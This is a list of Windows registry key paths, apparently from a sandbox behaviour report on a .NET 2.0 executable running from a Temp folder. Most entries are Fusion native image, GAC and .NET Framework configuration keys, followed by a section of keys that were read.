HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\102c630\2de2947e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|YWMUNUJU.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|YWMUNUJU.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|YWMUNUJU.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\102c630\216a9afb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
